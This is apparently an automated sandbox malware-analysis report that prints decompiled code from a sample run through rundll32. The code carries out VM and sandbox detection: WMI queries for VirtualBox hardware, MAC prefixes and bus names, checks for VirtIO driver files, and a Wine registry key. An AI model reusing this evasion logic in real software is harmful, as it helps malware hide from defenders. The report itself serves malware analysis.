                • String ID: Checking file %s $System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                • API String ID: 2137468328-3181514389
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1210 285c809e7d0-285c809e802 call 285c80a0410 1213 285c809ea47-285c809ea54 1210->1213 1214 285c809e808-285c809e84e SysAllocString * 2 1210->1214 1215 285c809e850-285c809e853 1214->1215 1216 285c809e8a5-285c809e8b0 1214->1216 1219 285c809e855-285c809e871 1215->1219 1220 285c809e89c-285c809e89f SysFreeString 1215->1220 1217 285c809e8b2-285c809e8b5 SysFreeString 1216->1217 1218 285c809e8bb-285c809e8cb 1216->1218 1217->1218 1221 285c809ea34-285c809ea46 1218->1221 1222 285c809e8d1-285c809e8f6 1218->1222 1225 285c809e87b-285c809e87d 1219->1225 1220->1216 1223 285c809ea14-285c809ea2e CoUninitialize 1222->1223 1224 285c809e8fc 1222->1224 1223->1221 1226 285c809e900-285c809e91d 1224->1226 1225->1220 1227 285c809e87f-285c809e896 CoUninitialize 1225->1227 1232 285c809ea10 1226->1232 1233 285c809e923-285c809e93f 1226->1233 1227->1220 1232->1223 1236 285c809e945-285c809e947 1233->1236 1237 285c809e977-285c809e9c3 1236->1237 1238 285c809e949-285c809e94e 1236->1238 1244 285c809e9f3-285c809e9ff 1237->1244 1245 285c809e9c5-285c809e9ca 1237->1245 1238->1237 1239 285c809e950-285c809e954 1238->1239 1240 285c809e96d-285c809e971 VariantClear 1239->1240 1241 285c809e956-285c809e969 call 285c80c9740 1239->1241 1240->1237 1241->1240 1244->1232 1251 285c809ea01-285c809ea08 1244->1251 1245->1244 1247 285c809e9cc-285c809e9d0 1245->1247 1248 285c809e9d2-285c809e9e5 call 285c80c9740 1247->1248 1249 285c809e9e9-285c809e9ed VariantClear 1247->1249 1248->1249 1249->1244 1251->1226 1253 285c809ea0e 1251->1253 1253->1223
                C-Code - Quality: 16%
                			E00000285285C809E7D0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14) {
                				void* __rbx;
                				void* _t74;
                				void* _t75;
                				void* _t93;
                				long long _t117;
                				long long _t119;
                				void* _t122;
                				intOrPtr* _t131;
                				long long _t156;
                				void* _t159;
                				void* _t160;
                				void* _t161;
                				void* _t168;
                				long long _t173;
                
                				_t156 = __rsi;
                				_t159 = _t160 - 0x47;
                				_t161 = _t160 - 0x90;
                				r15d = 0;
                				 *((long long*)(_t159 + 0x7f)) = _t173;
                				 *((long long*)(_t159 - 0x19)) = _t173;
                				 *((long long*)(_t159 + 0x77)) = _t173;
                				_t75 = E00000285285C80A0410(_t74, _t159 + 0x7f, _t159 - 0x19, __rsi); // executed
                				if (_t75 == 0) goto 0xc809ea47;
                				 *((long long*)(_t161 + 0x88)) = _t156;
                				 *((long long*)(_t161 + 0x80)) = __rdi;
                				 *((long long*)(_t161 + 0x78)) = __r12;
                				 *((long long*)(_t161 + 0x70)) = __r14;
                				__imp__#2();
                				__imp__#2();
                				r12d = 1;
                				r14d = r12d;
                				if (__rax == 0) goto 0xc809e8a5;
                				if (__rax == 0) goto 0xc809e89c;
                				 *((long long*)(_t161 + 0x28)) = _t159 + 0x77;
                				_t14 = _t173 + 0x30; // 0x30
                				r9d = _t14;
                				 *((long long*)(_t161 + 0x20)) = _t173;
                				_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f))));
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0xa0))() >= 0) goto 0xc809e89c;
                				r14d = r15d;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
                				_t117 =  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19))));
                				 *((intOrPtr*)(_t117 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0xc809e8bb;
                				__imp__#6();
                				if (r14d == 0) goto 0xc809ea34;
                				_t131 =  *((intOrPtr*)(_t159 + 0x77));
                				 *((long long*)(_t159 + 0x6f)) = _t173;
                				 *((intOrPtr*)(_t159 + 0x67)) = r15d;
                				 *(_t159 - 0x11) = r15w;
                				 *((long long*)(_t159 - 0xf)) = _t117;
                				 *((long long*)(_t159 - 7)) = _t117;
                				 *((intOrPtr*)(_t159 + 1)) = 0;
                				 *((short*)(_t159 + 5)) = 0;
                				if (_t131 == 0) goto 0xc809ea14;
                				 *((long long*)(_t161 + 0x20)) = _t159 + 0x67;
                				r8d = r12d; // executed
                				 *((intOrPtr*)( *_t131 + 0x20))();
                				if ( *((intOrPtr*)(_t159 + 0x67)) == r15d) goto 0xc809ea10;
                				 *((long long*)(_t161 + 0x28)) = _t173;
                				r8d = 0;
                				 *((long long*)(_t161 + 0x20)) = _t173;
                				_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))); // executed
                				 *((intOrPtr*)(_t119 + 0x20))();
                				if (0 < 0) goto 0xc809e977;
                				if ( *(_t159 - 0x11) == r12w) goto 0xc809e977;
                				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0xc809e96d;
                				E00000285285C80C9740(_t122,  *((intOrPtr*)(_t159 - 9)), L"VirtualBox",  *((intOrPtr*)(_t161 + 0x88)),  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))), _t168);
                				_t92 =  !=  ? r12d : r15d;
                				__imp__#9();
                				 *(_t159 + 7) = r15w;
                				 *((long long*)(_t159 + 0x11)) = _t119;
                				 *((long long*)(_t159 + 9)) = _t119;
                				r8d = 0;
                				asm("movups xmm0, [ebp+0x7]");
                				 *((intOrPtr*)(_t159 + 0x19)) = 0;
                				 *((short*)(_t159 + 0x1d)) = 0;
                				asm("movsd xmm1, [ebp+0x17]");
                				asm("movups [ebp-0x11], xmm0");
                				 *((long long*)(_t161 + 0x28)) = _t173;
                				asm("movsd [ebp-0x1], xmm1");
                				 *((long long*)(_t161 + 0x20)) = _t173;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x20))();
                				if (0 < 0) goto 0xc809e9f3;
                				if ( *(_t159 - 0x11) == r12w) goto 0xc809e9f3;
                				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0xc809e9e9;
                				E00000285285C80C9740(_t122,  *((intOrPtr*)(_t159 - 9)), L"Oracle Corporation",  *((intOrPtr*)(_t161 + 0x88)), _t167, _t168);
                				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
                				__imp__#9();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x10))();
                				if (_t93 != 0) goto 0xc809ea10;
                				if ( *((intOrPtr*)(_t159 + 0x77)) != 0) goto 0xc809e900;
                				goto 0xc809ea14;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x77)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19)))) + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return _t93;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocClearFreeUninitializeVariantwcsstr$Initialize
                • String ID: Manufacturer$Oracle Corporation$Product$SELECT * FROM Win32_BaseBoard$VirtualBox$WQL
                • API String ID: 1018877641-1142199694
                • Opcode ID: 60b8ea03e04fce65a111e3a6f6c4d750f021f66cb18c76577025c873ab81917a
                • Instruction ID: 866d3dcabce68ccf9e3543e1960a6dd0c1e0ebc3b80736f888969640da3a13e3
                • Opcode Fuzzy Hash: 60b8ea03e04fce65a111e3a6f6c4d750f021f66cb18c76577025c873ab81917a
                • Instruction Fuzzy Hash: 5C81203A606F50CAEB50CF69E8583AD33E4FB84B88F4085169E5D67A68DF38C559CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 26%
                			E00000285285C809E5C0(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, long long __r15, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v24;
                				long long _v32;
                				long long _v40;
                				long long _v48;
                				intOrPtr _v72;
                				signed short _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* _t53;
                				void* _t54;
                				signed char _t60;
                				intOrPtr _t99;
                				intOrPtr* _t112;
                				long long _t133;
                				long long _t134;
                				void* _t145;
                
                				_t134 = __rsi;
                				_a24 = _t133;
                				_v88 = _t133;
                				_a16 = _t133;
                				_t54 = E00000285285C80A0410(_t53,  &_a24,  &_v88, __rsi); // executed
                				if (_t54 == 0) goto 0xc809e7c3;
                				_v24 = __rbx;
                				_v32 = _t134;
                				_v40 = __r14;
                				_v48 = __r15;
                				__imp__#2();
                				_t135 = __rax;
                				__imp__#2();
                				r15d = 1;
                				_t102 = __rax;
                				r14d = r15d;
                				if (__rax == 0) goto 0xc809e684;
                				if (__rax == 0) goto 0xc809e67b;
                				_v96 =  &_a16;
                				_t13 = _t133 + 0x30; // 0x31
                				r9d = _t13;
                				_v104 = _t133;
                				_t144 =  *_a24;
                				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xc809e67b;
                				r14d = 0;
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0xc809e692;
                				__imp__#6();
                				if (r14d == 0) goto 0xc809e7ab;
                				_t112 = _a16;
                				_a32 = _t133;
                				_a8 = 0;
                				if (_t112 == 0) goto 0xc809e78b;
                				_v104 =  &_a8;
                				r8d = r15d; // executed
                				 *((intOrPtr*)( *_t112 + 0x20))();
                				if (_a8 == 0) goto 0xc809e77c;
                				_v96 = _t133;
                				r8d = 0;
                				_v104 = _t133;
                				_t99 =  *_a32; // executed
                				if ( *((intOrPtr*)(_t99 + 0x20))() < 0) goto 0xc809e763;
                				_t60 = _v80 & 0x0000ffff;
                				if (_t60 == r15w) goto 0xc809e763;
                				if ((_t60 & 0x00000008) == 0) goto 0xc809e759;
                				E00000285285C80C9740(__rax, _v72, L"ACPIBus_BUS_0", __rax,  *_a24, _t145);
                				if (_t99 != 0) goto 0xc809e757;
                				E00000285285C80C9740(_t102, _v72, L"PCI_BUS_0", _t135, _t144, _t145);
                				if (_t99 != 0) goto 0xc809e757;
                				E00000285285C80C9740(_t102, _v72, L"PNP_BUS_0", _t135, _t144, _t145);
                				if (_t99 == 0) goto 0xc809e759;
                				__imp__#9();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				if (_a16 != 0) goto 0xc809e6c0;
                				goto 0xc809e780;
                				if (1 != 3) goto 0xc809e78b;
                				_t74 =  ==  ? r15d : 0;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				_t68 =  ==  ? r15d : 0;
                				return  ==  ? r15d : 0;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$wcsstr$AllocFreeUninitialize$ClearInitializeVariant
                • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$SELECT * FROM Win32_Bus$WQL
                • API String ID: 2365594256-2399075642
                • Opcode ID: 7e007c52e842b73164768ccf955c41c27e330a4540f0ea4145b43c5dc9dcff79
                • Instruction ID: 4a956898d620949c28e943cccd97fb3c94f9dab7ca9c712a5ba5c4d2cfb28160
                • Opcode Fuzzy Hash: 7e007c52e842b73164768ccf955c41c27e330a4540f0ea4145b43c5dc9dcff79
                • Instruction Fuzzy Hash: 59513D3A302F6086EB108F25D88869C77A4F788FD8F148116EE5E57B64DF78C955CB41
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00000285285C809E1C0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v32;
                				long long _v40;
                				long long _v48;
                				long long _v56;
                				intOrPtr _v72;
                				short _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* __rbx;
                				void* _t49;
                				void* _t50;
                				void* _t63;
                				void* _t86;
                				intOrPtr* _t95;
                				long long _t115;
                				void* _t126;
                				long long _t131;
                
                				_t115 = __rsi;
                				r15d = 0;
                				_a16 = _t131;
                				_v88 = _t131;
                				_a24 = _t131;
                				_t50 = E00000285285C80A0410(_t49,  &_a16,  &_v88, __rsi); // executed
                				if (_t50 == 0) goto 0xc809e38c;
                				_v32 = _t115;
                				_v40 = __rdi;
                				_v48 = __r12;
                				_v56 = __r14;
                				__imp__#2();
                				__imp__#2();
                				r12d = 1;
                				r14d = r12d;
                				if (__rax == 0) goto 0xc809e28a;
                				if (__rax == 0) goto 0xc809e281;
                				_v96 =  &_a24;
                				_t13 = _t131 + 0x30; // 0x30
                				r9d = _t13;
                				_v104 = _t131;
                				if ( *((intOrPtr*)( *_a16 + 0xa0))() >= 0) goto 0xc809e281;
                				r14d = r15d;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0xc809e29d;
                				__imp__#6();
                				if (r14d == 0) goto 0xc809e37c;
                				_t95 = _a24;
                				_a32 = _t131;
                				_a8 = r15d;
                				if (_t95 == 0) goto 0xc809e358;
                				asm("o16 nop [eax+eax]");
                				_v104 =  &_a8;
                				r8d = r12d; // executed
                				 *((intOrPtr*)( *_t95 + 0x20))();
                				if (_a8 == r15d) goto 0xc809e358;
                				_v96 = _t131;
                				r8d = 0;
                				_v104 = _t131;
                				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0xc809e33d;
                				if (_v80 != 8) goto 0xc809e333;
                				E00000285285C80C9740(_t86, _v72, L"PCI\\VEN_80EE&DEV_CAFE", _v32,  *_a16, _t126);
                				_t63 =  !=  ? r12d : r15d;
                				__imp__#9();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				if (_t63 != 0) goto 0xc809e358;
                				if (_a24 != 0) goto 0xc809e2d0;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return _t63;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$SELECT * FROM Win32_PnPEntity$WQL
                • API String ID: 1998430482-342862491
                • Opcode ID: b16e8b392220c056975451eb42b1941d977d1626cf3c28a848fe2749b5378a2c
                • Instruction ID: a9a7fc11eaae9bba73a4730a78e91e581d9550aecb8a15baa51bf968dd8deee9
                • Opcode Fuzzy Hash: b16e8b392220c056975451eb42b1941d977d1626cf3c28a848fe2749b5378a2c
                • Instruction Fuzzy Hash: 93517A7A302F6086EB50DF21E84869C77A4F788F98F049116EE5E13B68CF78C884CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00000285285C809DAE0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v32;
                				long long _v40;
                				long long _v48;
                				long long _v56;
                				intOrPtr _v72;
                				signed short _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* __rbx;
                				void* _t51;
                				void* _t52;
                				signed char _t58;
                				void* _t66;
                				void* _t90;
                				intOrPtr* _t99;
                				long long _t119;
                				void* _t130;
                				long long _t135;
                
                				_t119 = __rsi;
                				r15d = 0;
                				_a24 = _t135;
                				_v88 = _t135;
                				_a16 = _t135;
                				_t52 = E00000285285C80A0410(_t51,  &_a24,  &_v88, __rsi); // executed
                				if (_t52 == 0) goto 0xc809dcb5;
                				_v32 = _t119;
                				_v40 = __rdi;
                				_v48 = __r12;
                				_v56 = __r14;
                				__imp__#2();
                				__imp__#2();
                				r12d = 1;
                				r14d = r12d;
                				if (__rax == 0) goto 0xc809dbaa;
                				if (__rax == 0) goto 0xc809dba1;
                				_v96 =  &_a16;
                				_t13 = _t135 + 0x30; // 0x30
                				r9d = _t13;
                				_v104 = _t135;
                				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xc809dba1;
                				r14d = r15d;
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0xc809dbbd;
                				__imp__#6();
                				if (r14d == 0) goto 0xc809dca5;
                				_t99 = _a16;
                				_a32 = _t135;
                				_a8 = r15d;
                				if (_t99 == 0) goto 0xc809dc85;
                				asm("o16 nop [eax+eax]");
                				_v104 =  &_a8;
                				r8d = r12d; // executed
                				 *((intOrPtr*)( *_t99 + 0x20))();
                				if (_a8 == r15d) goto 0xc809dc81;
                				_v96 = _t135;
                				r8d = 0;
                				_v104 = _t135;
                				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0xc809dc64;
                				_t58 = _v80 & 0x0000ffff;
                				if (_t58 == r12w) goto 0xc809dc64;
                				if ((_t58 & 0x00000008) == 0) goto 0xc809dc5a;
                				E00000285285C80C9740(_t90, _v72, L"08:00:27", _v32,  *_a24, _t130);
                				_t66 =  !=  ? r12d : r15d;
                				__imp__#9();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				if (_t66 != 0) goto 0xc809dc81;
                				if (_a16 != 0) goto 0xc809dbf0;
                				goto 0xc809dc85;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return _t66;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                • String ID: 08:00:27$MACAddress$SELECT * FROM Win32_NetworkAdapterConfiguration$WQL
                • API String ID: 1998430482-232164535
                • Opcode ID: 6ba35c0f7f04304ece7884aa3fcef00359219ea4fa24f49e35be5c11240c4b47
                • Instruction ID: eba4d879fa849869ed41b1ed22b9152b252a011d3c011d4e6c2ec134f1cad488
                • Opcode Fuzzy Hash: 6ba35c0f7f04304ece7884aa3fcef00359219ea4fa24f49e35be5c11240c4b47
                • Instruction Fuzzy Hash: 1851467A302F6186EB509F25E88869D77A4F784FDAF049116EE5E53B68CF38C485CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000285285C80C562C(void* __edx) {
                				void* _t5;
                
                				_t5 = __edx;
                				if (_t5 == 0) goto 0xc80c566d;
                				if (_t5 == 0) goto 0xc80c5661;
                				if (_t5 == 0) goto 0xc80c5654;
                				if (__edx == 1) goto 0xc80c564d;
                				return 1;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                • String ID:
                • API String ID: 4221786481-0
                • Opcode ID: ff800ab2db41e843c896150d515926f0aab756e0c4513797aed0fc6be21e75b0
                • Instruction ID: 2800b867953eb4a64711307b8b63c060f33a82c3a87d80729ad2872a83e64b45
                • Opcode Fuzzy Hash: ff800ab2db41e843c896150d515926f0aab756e0c4513797aed0fc6be21e75b0
                • Instruction Fuzzy Hash: 2B51A03D203F6185FA21AF65A44E39A2AD1FB55784F94C017A945772E7DE3CC885CF02
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                • String ID: %ProgramW6432%
                • API String ID: 3127241168-1092591020
                • Opcode ID: 240790d4de1382edf41dad9dca8e2698f3845ca8bcdfb4e0c4a6990b92bb54b3
                • Instruction ID: e9e46de04e59de81cbc270d08d659328297f7c9dae1e6bc21194e1bf5876ffee
                • Opcode Fuzzy Hash: 240790d4de1382edf41dad9dca8e2698f3845ca8bcdfb4e0c4a6990b92bb54b3
                • Instruction Fuzzy Hash: 8131B439216FD081F7618B68E44A3D5A3A1FFD5359F809103DA89935A1EF3DD256CF04
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00000285285C809F630(void* __r9) {
                				signed int _v24;
                				char _v552;
                				char _v1080;
                				char _v1584;
                				void* _v1608;
                				signed char _t17;
                				void* _t20;
                				void* _t24;
                				void* _t25;
                				signed long long _t30;
                				void* _t39;
                				void* _t42;
                				signed long long _t43;
                				void* _t44;
                				void* _t46;
                
                				_t46 = __r9;
                				_t30 =  *0xc814c720; // 0xee50a592130
                				_v24 = _t30 ^ _t43;
                				r8d = 0x208;
                				E00000285285C80C8EF0(_t20, 0, _t24, _t25,  &_v552, _t39, _t42, _t44);
                				asm("movups xmm0, [0x728ab]");
                				asm("movsd xmm1, [0x728ac]");
                				r8d = 0x1f0;
                				asm("movaps [esp+0x20], xmm0");
                				asm("movsd [esp+0x30], xmm1");
                				E00000285285C80C8EF0(_t20, 0, _t24, _t25,  &_v1584, _t39, _t42, _t44);
                				if (E00000285285C80A00A0() == 0) goto 0xc809f6b0;
                				r8d = 0x104;
                				ExpandEnvironmentStringsW(??, ??, ??);
                				goto 0xc809f6bf;
                				r9d = 0;
                				_t5 = _t46 + 0x26; // 0x26
                				r8d = _t5;
                				__imp__SHGetSpecialFolderPathW();
                				__imp__PathCombineW();
                				_t17 = GetFileAttributesW(??); // executed
                				if (_t17 == 0xffffffff) goto 0xc809f70e;
                				if ((_t17 & 0x00000010) == 0) goto 0xc809f70e;
                				return E00000285285C80C59D0(0, _v24 ^ _t43,  &_v1080, _t46);
                			}



















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                • String ID: %ProgramW6432%
                • API String ID: 3127241168-1092591020
                • Opcode ID: b59245fd65e9b791ab1eaa45c61e82f27590b30b7f03f9e56fb6d21ffa3f5bbc
                • Instruction ID: 1de8189ff1277136db6fdcfe07e4edd5766fbc32d51d31582d8fa3d5bde5af81
                • Opcode Fuzzy Hash: b59245fd65e9b791ab1eaa45c61e82f27590b30b7f03f9e56fb6d21ffa3f5bbc
                • Instruction Fuzzy Hash: 4F21CF3A326EA081FB709F24E84A3DA63A1FBC5345F808103D64D525A6EF3DC219CF40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00000285285C80A0130(void* __rdx, void* __r8, void* __r9) {
                				signed int _v40;
                				char _v2088;
                				char _v2096;
                				char _v2104;
                				long long _v2112;
                				long long _v2120;
                				void* __rdi;
                				long _t17;
                				long _t18;
                				void* _t24;
                				void* _t26;
                				void* _t27;
                				signed long long _t32;
                				long long _t36;
                				void* _t50;
                				signed long long _t52;
                
                				_t54 = __r9;
                				_t32 =  *0xc814c720; // 0xee50a592130
                				_v40 = _t32 ^ _t52;
                				_v2104 = 0;
                				r8d = 0x800;
                				_t50 = __r9;
                				E00000285285C80C8EF0(_t24, 0, _t26, _t27,  &_v2088, __rdx, __r9, __r8);
                				_v2096 = 0x104;
                				r9d = 0x20019;
                				_v2120 =  &_v2104;
                				r8d = 0;
                				_t17 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
                				if (_t17 != 0) goto 0xc80a01fc;
                				_v2112 =  &_v2096;
                				r9d = 0;
                				_t36 =  &_v2088;
                				r8d = 0;
                				_v2120 = _t36;
                				_t18 = RegQueryValueExW(??, ??, ??, ??, ??, ??); // executed
                				if (_t18 != 0) goto 0xc80a01f1;
                				__imp__StrStrIW();
                				if (_t36 == 0) goto 0xc80a01f1;
                				RegCloseKey(??);
                				goto 0xc80a01fe;
                				RegCloseKey(??); // executed
                				return E00000285285C80C59D0(_t24, _v40 ^ _t52, _t50, _t54);
                			}




















                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Close$OpenQueryValue
                • String ID:
                • API String ID: 1607946009-0
                • Opcode ID: 55a56b10943a406aeb13849472735ca925f2f98bffe12306ae4cdfa32b233224
                • Instruction ID: d7dde26c6aa53de0675f38ddae131e7ca2cc01feb93415802189ebc50e1652bd
                • Opcode Fuzzy Hash: 55a56b10943a406aeb13849472735ca925f2f98bffe12306ae4cdfa32b233224
                • Instruction Fuzzy Hash: CB21543A326F90C6FB609B15F858B9A63A0FB85B95F409126AE8D57B94DF3CC5448F00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000285285C809F230(void* __eflags, void* __rdx) {
                				signed int _v24;
                				char _v536;
                				char _v552;
                				long long _v568;
                				long _t11;
                				void* _t15;
                				void* _t18;
                				void* _t19;
                				signed long long _t23;
                				void* _t34;
                				signed long long _t35;
                				void* _t36;
                
                				_t23 =  *0xc814c720; // 0xee50a592130
                				_v24 = _t23 ^ _t35;
                				r8d = 0x200;
                				E00000285285C80C8EF0(_t15, 0, _t18, _t19,  &_v536, __rdx, _t34, _t36);
                				E00000285285C809D1D0(_t15, _t23 ^ _t35,  &_v536, __rdx, L"Checking reg key %s ", L"SOFTWARE\\Wine");
                				_v552 = 0;
                				r9d = 0x20019;
                				_v568 =  &_v552;
                				r8d = 0;
                				_t11 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
                				if (_t11 != 0) goto 0xc809f2d4;
                				RegCloseKey(??);
                				return E00000285285C80C59D0(_t15, _v24 ^ _t35, L"SOFTWARE\\Wine", L"SOFTWARE\\Wine");
                			}
















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $SOFTWARE\Wine
                • API String ID: 47109696-2978923392
                • Opcode ID: aca2282ee8955166689f40ec5f0f89f9c8b39eb2a9a0a893a35249dd975d82ff
                • Instruction ID: fae8934d70af39fd1edd87e0f7962fca7b87558504bacfa9a562633b1080c22a
                • Opcode Fuzzy Hash: aca2282ee8955166689f40ec5f0f89f9c8b39eb2a9a0a893a35249dd975d82ff
                • Instruction Fuzzy Hash: 12115B3A625FA082FB60DB60F45979A63A0FBC5795F808113AA5D53B95DF7CC105CF00
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$AllocQuery
                • String ID:
                • API String ID: 31662377-0
                • Opcode ID: fc9c0bc593f962cbe64dea5118a7e4a816657dd97a63b27e4f18f9465b597b42
                • Instruction ID: 906478d64428e10e4f9aadc829c09b9a3369b348c83cb82ea82db963a5e5549e
                • Opcode Fuzzy Hash: fc9c0bc593f962cbe64dea5118a7e4a816657dd97a63b27e4f18f9465b597b42
